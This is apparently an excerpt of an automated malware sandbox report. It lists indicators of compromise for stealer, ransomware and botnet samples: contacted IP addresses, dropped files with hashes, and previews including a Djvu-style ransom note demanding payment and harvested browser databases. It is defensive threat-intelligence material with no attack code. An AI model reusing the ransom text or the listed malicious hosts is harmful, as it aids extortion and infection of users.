                                                      • 201.108.153.230
                                                      XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                                      • 187.170.192.109
                                                      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                                      • 187.143.58.5
                                                      6uBxa0vGQt.elfGet hashmaliciousGafgytBrowse
                                                      • 187.154.84.205
                                                      Xi102MnZby.elfGet hashmaliciousMiraiBrowse
                                                      • 189.162.156.233
                                                      UTHyAUOVPD.elfGet hashmaliciousMiraiBrowse
                                                      • 187.236.73.135
                                                      S4kCacU4pQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                      • 189.229.88.234
                                                      qwmLv2FcgD.elfGet hashmaliciousUnknownBrowse
                                                      • 148.212.20.244
                                                      tato tu_.msgGet hashmaliciousUnknownBrowse
                                                      • 187.218.53.183
                                                      AKAMAI-ASUSla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                      • 23.36.242.165
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                      • 104.102.42.29
                                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                      • 23.210.122.61
                                                      VWOm7n5MsV.elfGet hashmaliciousUnknownBrowse
                                                      • 23.74.215.189
                                                      https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      https://steamcomnumitly.com/get/spring/afaFJ4a/50Get hashmaliciousUnknownBrowse
                                                      • 2.16.202.91
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      6T1S0q3QLa.elfGet hashmaliciousMiraiBrowse
                                                      • 88.221.138.6
                                                      FREE-NET-ASFREEnetEUYvF8xPbiml.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 147.45.47.126
                                                      CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                      • 147.45.47.126
                                                      XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                                      • 193.233.132.167
                                                      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                                      • 193.233.132.167
                                                      SecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                                                      • 147.45.47.149
                                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                      • 147.45.47.126
                                                      lgX7lgUL1w.exeGet hashmaliciousNeoreklami, PureLog Stealer, SmokeLoaderBrowse
                                                      • 147.45.47.149
                                                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                      • 147.45.47.126
                                                      SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                                                      • 147.45.47.149
                                                      SecuriteInfo.com.Trojan.PWS.RisePro.156.1977.119.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 147.45.47.126
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      a0e9f5d64349fb13191bc781f81f42e1YvF8xPbiml.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      swift.xlsGet hashmaliciousUnknownBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      NFs_468.msiGet hashmaliciousVMdetectBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      https://proviaproducts-my.sharepoint.com/:b:/g/personal/bob_rossi_provia_com/EadoUKaCx_pLpRRZlPhQBbkBX2-aayjJ2XxHM4MjJFfXkA?e=7rg6fPGet hashmaliciousUnknownBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xlsGet hashmaliciousUnknownBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      IT1_Individual_Resident_Return_XLS.zipGet hashmaliciousUnknownBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      https://degroofpetercam.sharefile.eu/f/foeaa098-ab4a-4383-832f-352520075f87?a=adfc24f975fb17a5Get hashmaliciousUnknownBrowse
                                                      • 104.196.109.209
                                                      • 103.174.152.66
                                                      • 192.185.16.114
                                                      • 162.159.134.233
                                                      51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                      • 65.109.242.59
                                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                      • 65.109.242.59
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 65.109.242.59
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 65.109.242.59
                                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                      • 65.109.242.59
                                                      SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                      • 65.109.242.59
                                                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                      • 65.109.242.59
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 65.109.242.59
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 65.109.242.59
                                                      SecuriteInfo.com.Trojan.PWS.Steam.37259.28451.11337.exeGet hashmaliciousCryptOne, VidarBrowse
                                                      • 65.109.242.59
                                                      37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      SecuriteInfo.com.Win32.Malware-gen.16925.17124.dllGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      SecuriteInfo.com.Win32.Malware-gen.16925.17124.dllGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      SecuriteInfo.com.Heuristic.HEUR.AGEN.1316618.2567.8320.exeGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      GU_9288409388723.msiGet hashmaliciousUnknownBrowse
                                                      • 104.102.42.29
                                                      • 188.114.96.3
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\ProgramData\EGIJEBGDAFHI\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                        CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                          jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                            file.exeGet hashmaliciousVidarBrowse
                                                              file.exeGet hashmaliciousVidarBrowse
                                                                SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                  SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                    BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                        btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                          C:\ProgramData\EGIJEBGDAFHI\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                                                            CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                                                              jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                    SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                      SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                        BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                            btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1381
                                                                                              Entropy (8bit):4.893644520875933
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
                                                                                              MD5:B65D7C11FCF0D75B3E599B80543A852D
                                                                                              SHA1:D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
                                                                                              SHA-256:D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
                                                                                              SHA-512:EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
                                                                                              Malicious:true
                                                                                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
                                                                                              Process:C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1381
                                                                                              Entropy (8bit):4.893644520875933
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNW6ltmFRqrs6314kA+GT/kF5M2/kJw3u:WZHfv0pfNAU5WEYNW6Ps41rDGT0f/kiw
                                                                                              MD5:B65D7C11FCF0D75B3E599B80543A852D
                                                                                              SHA1:D71B02226CD36AB342EAAE7C7F4D8E27851CEAC5
                                                                                              SHA-256:D12CAEE6C5DA734A7F78887977061BB922A6705C1E9771671D1054FA894F51C0
                                                                                              SHA-512:EF5763CDB7B53273D2FC74750C909AA7F373A66BB3B5B8E13FDD377A414B976889C0489F12FE5F1147CC862CA9B2EA67F2716B473984AA97CBF275C913065FC2
                                                                                              Malicious:true
                                                                                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):126976
                                                                                              Entropy (8bit):0.47147045728725767
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                              Category:dropped
                                                                                              Size (bytes):159744
                                                                                              Entropy (8bit):0.7873599747470391
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):98304
                                                                                              Entropy (8bit):0.08235737944063153
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):0.017262956703125623
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                              Malicious:false
                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):49152
                                                                                              Entropy (8bit):0.8180424350137764
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):5242880
                                                                                              Entropy (8bit):0.037963276276857943
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):32768
                                                                                              Entropy (8bit):0.017262956703125623
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                              Malicious:false
                                                                                              Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):9571
                                                                                              Entropy (8bit):5.536643647658967
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                              Malicious:false
                                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                              Category:dropped
                                                                                              Size (bytes):28672
                                                                                              Entropy (8bit):2.5793180405395284
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):685392
                                                                                              Entropy (8bit):6.872871740790978
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: CHA0VZiz8y.exe, Detection: malicious, Browse
                                                                                              • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                                                                              • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: btCbrSS2Je.exe, Detection: malicious, Browse
